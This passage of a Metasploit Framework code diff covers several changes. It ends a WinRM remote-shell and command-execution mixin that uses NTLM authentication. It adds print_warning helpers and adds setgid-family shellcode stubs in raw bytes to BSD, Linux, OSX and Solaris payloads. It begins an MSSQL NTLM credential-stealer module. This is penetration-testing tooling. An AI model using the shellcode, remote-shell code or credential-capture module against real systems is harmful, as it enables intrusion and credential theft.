'ctype' => ctype,
'headers' => { 'Authorization' => ntlm_message_1},
'data' => opts['data']
}))
resp = c.send_recv(r, to)
unless resp.kind_of? Rex::Proto::Http::Response
return [nil,nil]
end
return [nil,nil] if resp.code == 404
return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate']
# Get the challenge and craft the response
ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1]
return [nil,nil] unless ntlm_challenge
#old and simplier method but not compatible with windows 7/2008r2
#ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge)
#ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true})
ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge)
blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2)
challenge_key = blob_data[:challenge_key]
server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
#netbios name
default_name = blob_data[:default_name] || ''
#netbios domain
default_domain = blob_data[:default_domain] || ''
#dns name
dns_host_name = blob_data[:dns_host_name] || ''
#dns domain
dns_domain_name = blob_data[:dns_domain_name] || ''
#Client time
chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}
resp_lm,
resp_ntlm,
client_challenge,
ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key,
domain_name, default_name, default_domain,
dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
spnopt, ntlm_options)
ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'],
resp_lm, resp_ntlm, '', ntlmssp_flags)
ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3)
# Send the response
r = c.request_cgi(opts.merge({
'uri' => opts['uri'],
'method' => 'POST',
'ctype' => ctype,
'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"},
'data' => opts['data']
}))
resp = c.send_recv(r, to, true)
unless resp.kind_of? Rex::Proto::Http::Response
return [nil,nil]
end
return [nil,nil] if resp.code == 404
return [resp,c]
rescue ::Errno::EPIPE, ::Timeout::Error
end
end
def accepts_ntlm_auth
parse_auth_methods(winrm_poke).include? "Negotiate"
end
def target_url
proto = "http"
if rport == 5986 or datastore['SSL']
proto = "https"
end
if datastore['VHOST']
return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}"
else
return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
end
end
private
def winrm_option_set(options)
xml = "<w:OptionSet>"
options.each do |option_pair|
xml << winrm_option(*option_pair)
end
xml << "</w:OptionSet>"
return xml
end
def winrm_option(name,value)
%Q{<w:Option Name="#{name}">#{value}</w:Option>}
end
def winrm_selector_set(selectors)
xml = "<w:SelectorSet>"
selectors.each do |selector_pair|
xml << winrm_selector(*selector_pair)
end
xml << "</w:SelectorSet>"
return xml
end
def winrm_selector(name,value)
%Q{<w:Selector Name="#{name}">#{value}</w:Selector>}
end
def winrm_wql_body(wql)
%Q{
<env:Body>
<n:Enumerate>
<w:OptimizeEnumeration xsi:nil="true"/>
<w:MaxElements>32000</w:MaxElements>
<w:Filter Dialect="http://schemas.microsoft.com/wbem/wsman/1/WQL">#{wql}</w:Filter>
</n:Enumerate>
</env:Body>
}
end
def winrm_open_shell_body
%q{<env:Body>
<rsp:Shell>
<rsp:InputStreams>stdin</rsp:InputStreams>
<rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
</rsp:Shell>
</env:Body>}
end
def winrm_cmd_body(cmd)
%Q{ <env:Body>
<rsp:CommandLine>
<rsp:Command>&quot;#{cmd}&quot;</rsp:Command>
</rsp:CommandLine>
</env:Body>}
end
def winrm_cmd_recv_body(cmd_id)
%Q{<env:Body>
<rsp:Receive>
<rsp:DesiredStream CommandId="#{cmd_id}">stdout stderr</rsp:DesiredStream>
</rsp:Receive>
</env:Body>}
end
def winrm_terminate_cmd_body(cmd_id)
%Q{ <env:Body>
<rsp:Signal CommandId="#{cmd_id}">
<rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code>
</rsp:Signal>
</env:Body>}
end
def winrm_empty_body
%q{<env:Body/>}
end
def winrm_envelope(data)
%Q{
<?xml version="1.0" encoding="UTF-8"?>
<env:Envelope xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd"
xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config" xmlns:env="http://www.w3.org/2003/05/soap-envelope"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> #{data}</env:Envelope>
}
end
def winrm_header(data)
%Q{
<env:Header>
<a:To>#{target_url}</a:To>
<a:ReplyTo>
<a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
<a:MessageID>uuid:#{generate_uuid}</a:MessageID>
<w:Locale mustUnderstand="false" xml:lang="en-US"/>
<p:DataLocale mustUnderstand="false" xml:lang="en-US"/>
<w:OperationTimeout>PT60S</w:OperationTimeout>
#{data}
</env:Header>
}
end
def winrm_uri_action(type)
case type
when "wql"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/*</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate</a:Action>}
when "create_shell"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>}
when "send_cmd"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action>}
when "recv_cmd"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action>}
when "signal_shell"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action>}
when "delete_shell"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action>}
end
end
end
end

8
lib/msf/core/module.rb
View File

@ -208,6 +208,10 @@ class Module
super(print_prefix + msg)
end
def print_warning(msg='')
super(print_prefix + msg)
end
#
# Overwrite the Subscriber print_line to do custom prefixes
@ -241,6 +245,10 @@ class Module
def vprint_debug(msg)
print_debug(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
# Verbose version of #print_warning
def vprint_warning(msg)
print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
#
# Returns the module's framework full reference name. This is the

65
lib/msf/core/module/author.rb
View File

@ -12,38 +12,39 @@ class Msf::Module::Author
# A hash of known author names
Known =
{
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'Ramon de C Valle'=> 'rcvalle' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com'
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
}
#

50
lib/msf/core/payload/bsd.rb
View File

@ -40,6 +40,27 @@ module Msf::Payload::Bsd
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@ -99,6 +120,35 @@ module Msf::Payload::Bsd
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append
if (datastore['AppendExit'])

104
lib/msf/core/payload/linux.rb
View File

@ -40,6 +40,27 @@ module Msf::Payload::Linux
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('PrependChrootBreak',
[
false,
@ -102,6 +123,31 @@ module Msf::Payload::Linux
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
@ -185,6 +231,33 @@ module Msf::Payload::Linux
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
@ -235,6 +308,33 @@ module Msf::Payload::Linux
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x6a\x77" # push 0x77 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf2" # mov rdx,rsi #
pre << "\x6a\x72" # push 0x72 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x6a" # push 0x6a #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
@ -269,7 +369,7 @@ module Msf::Payload::Linux
pre << "\x48\x89\xe7" # mov rdi,rsp #
# loop chdir(..) 69 times
# syscall tendo to modify rcx can't use loop...
# syscall tend to modify rcx can't use loop...
pre << "\x6a\x45" # push 0x45 #
pre << "\x5b" # pop rbx #
pre << "\x6a\x50" # push 0x50 #
@ -278,7 +378,7 @@ module Msf::Payload::Linux
pre << "\xfe\xcb" # dec bl #
pre << "\x75\xf7" # jnz -7 #
# chrot (.) (witch should by /)
# chroot (.) (which should be /)
pre << "\x6a\x2e" # push . (0x2e) #
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x48\x89\xd0" # mov rax,rdx #

50
lib/msf/core/payload/osx.rb
View File

@ -40,6 +40,27 @@ module Msf::Payload::Osx
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@ -99,6 +120,35 @@ module Msf::Payload::Osx
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append
if (datastore['AppendExit'])

41
lib/msf/core/payload/php.rb
View File

@ -6,10 +6,17 @@ require 'msf/core'
###
module Msf::Payload::Php
def initialize(info = {})
super(info)
end
#
# Generate a chunk of PHP code that should be eval'd before
# #php_system_block.
#
# The generated code will initialize
#
# @options options [String] :disabled_varname PHP variable name in which to
# store an array of disabled functions.
#
# @returns [String] A chunk of PHP code
#
def php_preamble(options = {})
dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
dis = '$' + dis if (dis[0,1] != '$')
@ -32,6 +39,20 @@ module Msf::Payload::Php
return preamble
end
#
# Generate a chunk of PHP code that tries to run a command.
#
# @options options [String] :cmd_varname PHP variable name containing the
# command to run
# @options options [String] :disabled_varname PHP variable name containing
# an array of disabled functions. See #php_preamble
# @options options [String] :output_varname PHP variable name in which to
# store the output of the command. Will contain 0 if no exec functions
# work.
#
# @returns [String] A chunk of PHP code that, with a little luck, will run a
# command.
#
def php_system_block(options = {})
cmd = options[:cmd_varname] || '$cmd'
dis = options[:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
@ -102,12 +123,12 @@ module Msf::Payload::Php
# Currently unused until we can figure out how to get output with COM
# objects (which are not subject to safe mode restrictions) instead of
# PHP functions.
win32_com = "
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$wscript = new COM('Wscript.Shell');
$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
#{output} = file_get_contents('%TEMP%\\out.txt');
}else"
#win32_com = "
# if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
# $wscript = new COM('Wscript.Shell');
# $wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
# #{output} = file_get_contents('%TEMP%\\out.txt');
# }else"
fail_block = "
{
#{output}=0;

30
lib/msf/core/payload/solaris.rb
View File

@ -33,6 +33,20 @@ module Msf::Payload::Solaris
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@ -86,6 +100,22 @@ module Msf::Payload::Solaris
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xcb" +# movb $0xcb,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x2e" +# movb $0x2e,%al #
"\xff\xd6" # call *%esi #
end
# Append
if (datastore['AppendExit'])

8
lib/msf/core/plugin.rb
View File

@ -140,6 +140,14 @@ class Plugin
output.print_line(msg) if (output)
end
#
# Prints a warning
#
def print_warning(msg='')
output.print_warning(msg) if (output)
end
#
# Prints a message with no decoration.
#

4
lib/rex/io/bidirectional_pipe.rb
View File

@ -98,6 +98,10 @@ class BidirectionalPipe < Rex::Ui::Text::Input
print_line('[*] ' + msg)
end
def print_warning(msg='')
print_warning('[!] ' + msg)
end
#
# Wrappers for the pipe_input methods
#

11
lib/rex/post/meterpreter/packet_dispatcher.rb
View File

@ -367,6 +367,17 @@ module PacketDispatcher
end
end
# If the backlog and incomplete arrays are the same, it means
# dispatch_inbound_packet wasn't able to handle any of the
# packets. When that's the case, we can get into a situation
# where @pqueue is not empty and, since nothing else bounds this
# loop, we spin CPU trying to handle packets that can't be
# handled. Sleep here to treat that situation as though the
# queue is empty.
if (backlog.length > 0 && backlog.length == incomplete.length)
::IO.select(nil, nil, nil, 0.10)
end
@pqueue.unshift(*incomplete)
if(@pqueue.length > 100)

67
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
View File

@ -43,7 +43,14 @@ class Console::CommandDispatcher::Stdapi::Sys
"-t" => [ true, "The registry value type (E.g. REG_SZ)." ],
"-v" => [ true, "The registry value name (E.g. Stuff)." ],
"-r" => [ true, "The remote machine name to connect to (with current process credentials" ],
"-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
"-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
@@ps_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-S" => [ true, "Filters processes on the process name using the supplied RegEx"],
"-A" => [ true, "Filters processes on architecture (x86 or x86_64)" ],
"-s" => [ false, "Show only SYSTEM processes" ],
"-U" => [ true, "Filters processes on the user using the supplied RegEx" ])
#
# List of supported commands.
@ -274,6 +281,54 @@ class Console::CommandDispatcher::Stdapi::Sys
#
def cmd_ps(*args)
processes = client.sys.process.get_processes
@@ps_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
cmd_ps_help
return true
when "-S"
print_line "Filtering on process name..."
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
processes.each do |proc|
if val.nil? or val.empty?
print_line "You must supply a search term!"
return false
end
searched_procs << proc if proc["name"].match(/#{val}/)
end
processes = searched_procs
when "-A"
print_line "Filtering on arch..."
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
processes.each do |proc|
next if proc['arch'].nil? or proc['arch'].empty?
if val.nil? or val.empty? or !(val == "x86" or val == "x86_64")
print_line "You must select either x86 or x86_64"
return false
end
searched_procs << proc if proc["arch"] == val
end
processes = searched_procs
when "-s"
print_line "Filtering on SYSTEM processes..."
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
processes.each do |proc|
searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM"
end
processes = searched_procs
when "-U"
print_line "Filtering on user name..."
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
processes.each do |proc|
if val.nil? or val.empty?
print_line "You must supply a search term!"
return false
end
searched_procs << proc if proc["user"].match(/#{val}/)
end
processes = searched_procs
end
end
if (processes.length == 0)
print_line("No running processes were found.")
else
@ -284,6 +339,15 @@ class Console::CommandDispatcher::Stdapi::Sys
return true
end
def cmd_ps_help
print_line "Use the command with no arguments to see all running processes."
print_line "The following options can be used to filter those results:"
print_line @@ps_opts.usage
end
#
# Reboots the remote computer.
#
@ -595,6 +659,7 @@ class Console::CommandDispatcher::Stdapi::Sys
client.sys.power.shutdown
end
end
end

4
lib/rex/proto/smb/client.rb
View File

@ -1894,11 +1894,11 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
last_search_id = sid
last_offset = loff
last_filename = name
if eos != 1 #If we aren't at the end of the search, run find_next
if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next
resp = find_next(last_search_id, last_offset, last_filename)
search_next = 1 # Flip bit so response params will parse correctly
end
end until eos == 1
end until eos != 0 or last_offset == 0
rescue ::Exception
raise $!
end

1
lib/rex/script/base.rb
View File

@ -9,6 +9,7 @@ class Base
def print_status(msg); end
def print_good(msg); end
def print_error(msg); end
def print_warning(msg); end
end
attr_accessor :client, :framework, :path, :error, :args

6
lib/rex/ui/output.rb
View File

@ -45,6 +45,12 @@ class Output
def print_line(msg='')
end
#
# Prints a warning
#
def print_warning(msg='')
end
#
# Prints a message with no decoration.
#

10
lib/rex/ui/subscriber.rb
View File

@ -66,6 +66,16 @@ module Subscriber
end
end
#
# Wraps user_output.print_warning
#
def print_warning(msg='')
if (user_output)
print_blank_line if user_output.prompting?
user_output.print_warning(msg)
end
end
#
# Wraps user_output.print
#

7
lib/rex/ui/text/dispatcher_shell.rb
View File

@ -81,6 +81,13 @@ module DispatcherShell
shell.print_good(msg)
end
#
# Wraps shell.print_warning
#
def print_warning(msg = '')
shell.print_warning(msg)
end
#
# Wraps shell.print
#

4
lib/rex/ui/text/output.rb
View File

@ -67,6 +67,10 @@ class Output < Rex::Ui::Output
print(msg + "\n")
end
def print_warning(msg = '')
print_line("%bld%yel[!]%clr #{msg}")
end
def print(msg = '')
print_raw(substitute_colors(msg))
end

10
lib/rex/ui/text/shell.rb
View File

@ -303,6 +303,16 @@ module Shell
log_output(output.print_line(msg))
end
#
# Prints a warning message to the output handle.
#
def print_warning(msg='')
return if (disable_output == true)
self.on_print_proc.call(msg) if self.on_print_proc
log_output(output.print_warning(msg))
end
#
# Prints a raw message to the output handle.
#

2
modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb
View File

@ -35,13 +35,11 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Platform' => [ 'win' ],
'References' =>
[
[ 'OSVDB', '65533'],
[ 'URL', 'http://seclists.org/bugtraq/2010/Jun/160' ]
],
'Privileged' => true,
'DisclosureDate' => 'Jun 15 2010'
)

2
modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '73447' ],
[ 'CVE', '2008-2938' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
[ 'EDB', 17388 ],
[ 'EDB', '17388' ],
[ 'BID', '48225' ],
],
'Author' => [ 'patrick' ],

2
modules/auxiliary/admin/http/typo3_sa_2009_002.rb
View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '52048'],
['CVE', '2009-0815'],
['URL', 'http://secunia.com/advisories/33829/'],
['EDB', 8038],
['EDB', '8038'],
['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],
],
'DisclosureDate' => 'Feb 10 2009',

78
modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb Normal file
View File

@ -0,0 +1,78 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server NTLM Stealer',
'Description' => %q{
This module can be used to help capture or relay the LM/NTLM credentials of the
account running the remote SQL Server service. The module will use the supplied
credentials to connect to the target SQL Server instance and execute the native
